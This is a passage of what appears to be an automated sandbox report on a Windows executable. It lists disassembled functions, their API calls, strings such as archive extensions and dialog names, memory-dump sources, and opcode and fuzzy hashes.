                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                                            • String ID:
                                                                                                            • API String ID: 2148572870-0
                                                                                                            • Opcode ID: 757b2e8c3205a196e7b19c4eca095ac1f4282726b75a58896e35b6073d9716c5
                                                                                                            • Instruction ID: 2674951eefd261d97164b843f2e946a66bc480b070475869f001075cc800b20e
                                                                                                            • Opcode Fuzzy Hash: 757b2e8c3205a196e7b19c4eca095ac1f4282726b75a58896e35b6073d9716c5
                                                                                                            • Instruction Fuzzy Hash: CBF03C72A01219BBCB206BA5DD4CEDF7F7DEF51791F004012B60AD2150D6798686CBB1
                                                                                                            APIs
                                                                                                              • Part of subcall function 00CD05DA: _wcslen.LIBCMT ref: 00CD05E0
                                                                                                              • Part of subcall function 00CCB92D: _wcsrchr.LIBVCRUNTIME ref: 00CCB944
                                                                                                            • _wcslen.LIBCMT ref: 00CCC197
                                                                                                            • _wcslen.LIBCMT ref: 00CCC1DF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$_wcsrchr
                                                                                                            • String ID: .exe$.rar$.sfx
                                                                                                            • API String ID: 3513545583-31770016
                                                                                                            • Opcode ID: d1febb07f671b0b801b1a84eb80f7360c5e779c6559f10bf1405384e151d06bc
                                                                                                            • Instruction ID: 1b6b002f2aabfb91a04491bccd5b6ec8caa981fe83862c45f6b09dfa3b2a39ff
                                                                                                            • Opcode Fuzzy Hash: d1febb07f671b0b801b1a84eb80f7360c5e779c6559f10bf1405384e151d06bc
                                                                                                            • Instruction Fuzzy Hash: 3B413722500351A6C731AF75C882F7FB3B8EF40714F28094EFAA96B181EB619F81D391
                                                                                                            APIs
                                                                                                            • GetTempPathW.KERNEL32(00000800,?), ref: 00CDCE9D
                                                                                                              • Part of subcall function 00CCB690: _wcslen.LIBCMT ref: 00CCB696
                                                                                                            • _swprintf.LIBCMT ref: 00CDCED1
                                                                                                              • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                                                                            • SetDlgItemTextW.USER32(?,00000066,00D0946A), ref: 00CDCEF1
                                                                                                            • EndDialog.USER32(?,00000001), ref: 00CDCFFE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                                                                            • String ID: %s%s%u
                                                                                                            • API String ID: 110358324-1360425832
                                                                                                            • Opcode ID: 7d51ac5bcdf5b0ef2a09bdbc9c63ad3454c7cfbf95ec76520ac03416160f3941
                                                                                                            • Instruction ID: 807bd98755ab0ea970c7a80d8065f31d362af8fa9e2ceadbc015a0375dfc1671
                                                                                                            • Opcode Fuzzy Hash: 7d51ac5bcdf5b0ef2a09bdbc9c63ad3454c7cfbf95ec76520ac03416160f3941
                                                                                                            • Instruction Fuzzy Hash: DE4183B5900259AADF259B90CC85FEE77BCEB04300F4080A7FA09E7251EE709A45DF72
                                                                                                            APIs
                                                                                                            • _wcslen.LIBCMT ref: 00CCBB27
                                                                                                            • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00CCA275,?,?,00000800,?,00CCA23A,?,00CC755C), ref: 00CCBBC5
                                                                                                            • _wcslen.LIBCMT ref: 00CCBC3B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$CurrentDirectory
                                                                                                            • String ID: UNC$\\?\
                                                                                                            • API String ID: 3341907918-253988292
                                                                                                            • Opcode ID: 5945574e1961e7a75b20b050424858e9eacdf07f72d8b6d4dd8b4abde3ce30a7
                                                                                                            • Instruction ID: 86516d9a72fcccef30eb83d49653b02d65b0cff0250697f18a1ab372ac35f5de
                                                                                                            • Opcode Fuzzy Hash: 5945574e1961e7a75b20b050424858e9eacdf07f72d8b6d4dd8b4abde3ce30a7
                                                                                                            • Instruction Fuzzy Hash: FD41B431400259B6CF21AFA4CC43FEF77A9AF41391F10446AF965A3151EBB5DF90DA60
                                                                                                            APIs
                                                                                                            • LoadBitmapW.USER32(00000065), ref: 00CDB6ED
                                                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 00CDB712
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00CDB744
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00CDB767
                                                                                                              • Part of subcall function 00CDA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00CDB73D,00000066), ref: 00CDA6D5
                                                                                                              • Part of subcall function 00CDA6C2: SizeofResource.KERNEL32(00000000,?,?,?,00CDB73D,00000066), ref: 00CDA6EC
                                                                                                              • Part of subcall function 00CDA6C2: LoadResource.KERNEL32(00000000,?,?,?,00CDB73D,00000066), ref: 00CDA703
                                                                                                              • Part of subcall function 00CDA6C2: LockResource.KERNEL32(00000000,?,?,?,00CDB73D,00000066), ref: 00CDA712
                                                                                                              • Part of subcall function 00CDA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00CDB73D,00000066), ref: 00CDA72D
                                                                                                              • Part of subcall function 00CDA6C2: GlobalLock.KERNEL32(00000000), ref: 00CDA73E
                                                                                                              • Part of subcall function 00CDA6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00CDA762
                                                                                                              • Part of subcall function 00CDA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00CDA7A7
                                                                                                              • Part of subcall function 00CDA6C2: GlobalUnlock.KERNEL32(00000000), ref: 00CDA7C6
                                                                                                              • Part of subcall function 00CDA6C2: GlobalFree.KERNEL32(00000000), ref: 00CDA7CD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                                            • String ID: ]
                                                                                                            • API String ID: 1797374341-3352871620
                                                                                                            • Opcode ID: ad008849e1e84113d461527e860f1e63f38dea892afd6105636a8c51435e383b
                                                                                                            • Instruction ID: f467d0c27936611222048fad744141ad3d0d4674a3896fb775dc41710923b7fc
                                                                                                            • Opcode Fuzzy Hash: ad008849e1e84113d461527e860f1e63f38dea892afd6105636a8c51435e383b
                                                                                                            • Instruction Fuzzy Hash: 1801C436500601A7C7217B745D09A6F7A79ABC0752F0A0016FA10A7391DF25CE065272
                                                                                                            APIs
                                                                                                              • Part of subcall function 00CC1316: GetDlgItem.USER32(00000000,00003021), ref: 00CC135A
                                                                                                              • Part of subcall function 00CC1316: SetWindowTextW.USER32(00000000,00CF35F4), ref: 00CC1370
                                                                                                            • EndDialog.USER32(?,00000001), ref: 00CDD64B
                                                                                                            • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00CDD661
                                                                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 00CDD675
                                                                                                            • SetDlgItemTextW.USER32(?,00000068), ref: 00CDD684
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemText$DialogWindow
                                                                                                            • String ID: RENAMEDLG
                                                                                                            • API String ID: 445417207-3299779563
                                                                                                            • Opcode ID: 53faf220effbfdcf91c67346304b5ee9f943dc442f52168cbc13d1275bc57451
                                                                                                            • Instruction ID: 8bd6bbc28ddbc0b97e7c700c149778381c7b3983581466ecb2db8af0815c5f71
                                                                                                            • Opcode Fuzzy Hash: 53faf220effbfdcf91c67346304b5ee9f943dc442f52168cbc13d1275bc57451
                                                                                                            • Instruction Fuzzy Hash: 0E012D33648314BAD2214F659D09F57B76DEB6AB02F110816F306E12D0C6A1DA1797F5
                                                                                                            APIs
                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00CE7E24,00000000,?,00CE7DC4,00000000,00CFC300,0000000C,00CE7F1B,00000000,00000002), ref: 00CE7E93
                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00CE7EA6
                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00CE7E24,00000000,?,00CE7DC4,00000000,00CFC300,0000000C,00CE7F1B,00000000,00000002), ref: 00CE7EC9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                            • Opcode ID: 515e8870d203813e153e6bd98907f4ac23b65b25e7924788b223696284bce7d6
                                                                                                            • Instruction ID: f679381e63df317298eb76b13a65c9f3ee617029937832576dcb1c7da6185e33
                                                                                                            • Opcode Fuzzy Hash: 515e8870d203813e153e6bd98907f4ac23b65b25e7924788b223696284bce7d6
                                                                                                            • Instruction Fuzzy Hash: 70F04F31A00258BFCB15ABA1DC09BBEBFB4EB44715F0041AAF805A2260DB309F40CA92
                                                                                                            APIs
                                                                                                              • Part of subcall function 00CD081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CD0836
                                                                                                              • Part of subcall function 00CD081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CCF2D8,Crypt32.dll,00000000,00CCF35C,?,?,00CCF33E,?,?,?), ref: 00CD0858
                                                                                                            • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00CCF2E4
                                                                                                            • GetProcAddress.KERNEL32(00D081C8,CryptUnprotectMemory), ref: 00CCF2F4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                                            • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                            • API String ID: 2141747552-1753850145
                                                                                                            • Opcode ID: 377ab341597340c7665a507bc8b4f9a7425c9ab9850eac5f418c093c24e566e6
                                                                                                            • Instruction ID: 7f96bdb2a5efab659707fd71b9d336ac5778cd98872596ca605f7cab9007a85c
                                                                                                            • Opcode Fuzzy Hash: 377ab341597340c7665a507bc8b4f9a7425c9ab9850eac5f418c093c24e566e6
                                                                                                            • Instruction Fuzzy Hash: 99E02630801785BECB209F79D80CB217ED46F04700F14882EF1DA93340CAB0D141DB02
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AdjustPointer$_abort
                                                                                                            • String ID:
                                                                                                            • API String ID: 2252061734-0
                                                                                                            • Opcode ID: fe088f62782ea8c7c5b6ec21eb2d965a0c712a11c46260b3b67884cd2e29a480
                                                                                                            • Instruction ID: 295195b47ea4778bb7cecedc7b8f90dbaa315d9ff3c0a9f332f1c8745914a209
                                                                                                            • Opcode Fuzzy Hash: fe088f62782ea8c7c5b6ec21eb2d965a0c712a11c46260b3b67884cd2e29a480
                                                                                                            • Instruction Fuzzy Hash: 9151F572600296AFEB298F16DC45B7AB7A9FF14310F34412DEE16472A1D771EE80E790
                                                                                                            APIs
                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 00CEBF39
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CEBF5C
                                                                                                              • Part of subcall function 00CE8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00CECA2C,00000000,?,00CE6CBE,?,00000008,?,00CE91E0,?,?,?), ref: 00CE8E38
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00CEBF82
                                                                                                            • _free.LIBCMT ref: 00CEBF95
                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CEBFA4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 336800556-0
                                                                                                            • Opcode ID: 970310c8a2e49b5fe8c78250903b785cf4f676521761b80e7ccdd641dc74dff2
                                                                                                            • Instruction ID: 8c4043415e66c6fa6827c4c67a8fd431d70be9de0a163b5fc7a4104fdde0839d
                                                                                                            • Opcode Fuzzy Hash: 970310c8a2e49b5fe8c78250903b785cf4f676521761b80e7ccdd641dc74dff2
                                                                                                            • Instruction Fuzzy Hash: 5601F27A6012917F27212AFB5C8DE7F7A6DEEC2BA03254129F908D3200EF60CE01D5B1
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(?,00D01030,00000200,00CE91AD,00CE617E,?,?,?,?,00CCD984,?,?,?,00000004,00CCD710,?), ref: 00CE986E
                                                                                                            • _free.LIBCMT ref: 00CE98A3
                                                                                                            • _free.LIBCMT ref: 00CE98CA
                                                                                                            • SetLastError.KERNEL32(00000000,00CF3A34,00000050,00D01030), ref: 00CE98D7
                                                                                                            • SetLastError.KERNEL32(00000000,00CF3A34,00000050,00D01030), ref: 00CE98E0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 3170660625-0
                                                                                                            • Opcode ID: c8bb40283c65e51d808276a886e0abcb2764effaaa267eb84f4e898a98b32d47
                                                                                                            • Instruction ID: ac248acbc2ea9a7882ee85b15383301b9dabeb8db4894825fff335374fa8b23f
                                                                                                            • Opcode Fuzzy Hash: c8bb40283c65e51d808276a886e0abcb2764effaaa267eb84f4e898a98b32d47
                                                                                                            • Instruction Fuzzy Hash: FD01F4361446C17BC23223676C85B3F252DDFD3774B250136F525921F2EE748E05A166
                                                                                                            APIs
                                                                                                              • Part of subcall function 00CD11CF: ResetEvent.KERNEL32(?), ref: 00CD11E1
                                                                                                              • Part of subcall function 00CD11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00CD11F5
                                                                                                            • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00CD0F21
                                                                                                            • CloseHandle.KERNEL32(?,?), ref: 00CD0F3B
                                                                                                            • DeleteCriticalSection.KERNEL32(?), ref: 00CD0F54
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00CD0F60
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00CD0F6C
                                                                                                              • Part of subcall function 00CD0FE4: WaitForSingleObject.KERNEL32(?,000000FF,00CD1206,?), ref: 00CD0FEA
                                                                                                              • Part of subcall function 00CD0FE4: GetLastError.KERNEL32(?), ref: 00CD0FF6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 1868215902-0
                                                                                                            • Opcode ID: 7b42f802de7b3d92642bf5d159e101b92e0495e0dbd144e4d0399e7c3dbb7ee4
                                                                                                            • Instruction ID: 69bc1a2d8e147d72c3519467edd160327076d1944e786d843cb0dbd43cc5539f
                                                                                                            • Opcode Fuzzy Hash: 7b42f802de7b3d92642bf5d159e101b92e0495e0dbd144e4d0399e7c3dbb7ee4
                                                                                                            • Instruction Fuzzy Hash: 71015271500744FFC7229B64DC84FDAFBA9FB08710F10092AF26B92160CB757A45DA55
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 00CEC817
                                                                                                              • Part of subcall function 00CE8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CEC896,00CF3A34,00000000,00CF3A34,00000000,?,00CEC8BD,00CF3A34,00000007,00CF3A34,?,00CECCBA,00CF3A34), ref: 00CE8DE2
                                                                                                              • Part of subcall function 00CE8DCC: GetLastError.KERNEL32(00CF3A34,?,00CEC896,00CF3A34,00000000,00CF3A34,00000000,?,00CEC8BD,00CF3A34,00000007,00CF3A34,?,00CECCBA,00CF3A34,00CF3A34), ref: 00CE8DF4
                                                                                                            • _free.LIBCMT ref: 00CEC829
                                                                                                            • _free.LIBCMT ref: 00CEC83B
                                                                                                            • _free.LIBCMT ref: 00CEC84D
                                                                                                            • _free.LIBCMT ref: 00CEC85F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: 65a3389d8966381823ac69b5ccf42cacc89f42133234f446a2030d5895416df5
                                                                                                            • Instruction ID: 5c0c0e216d8651f804d26467eebcd25c89a02ebff33d4f783bd9cb9e3c5d9bf7
                                                                                                            • Opcode Fuzzy Hash: 65a3389d8966381823ac69b5ccf42cacc89f42133234f446a2030d5895416df5
                                                                                                            • Instruction Fuzzy Hash: 54F09632500291ABC734DB6AF9C5E1B73EABB00B147580819F11CD75A2CF70FE80CA51
                                                                                                            APIs
                                                                                                            • _wcslen.LIBCMT ref: 00CD1FE5
                                                                                                            • _wcslen.LIBCMT ref: 00CD1FF6
                                                                                                            • _wcslen.LIBCMT ref: 00CD2006
                                                                                                            • _wcslen.LIBCMT ref: 00CD2014
                                                                                                            • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00CCB371,?,?,00000000,?,?,?), ref: 00CD202F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
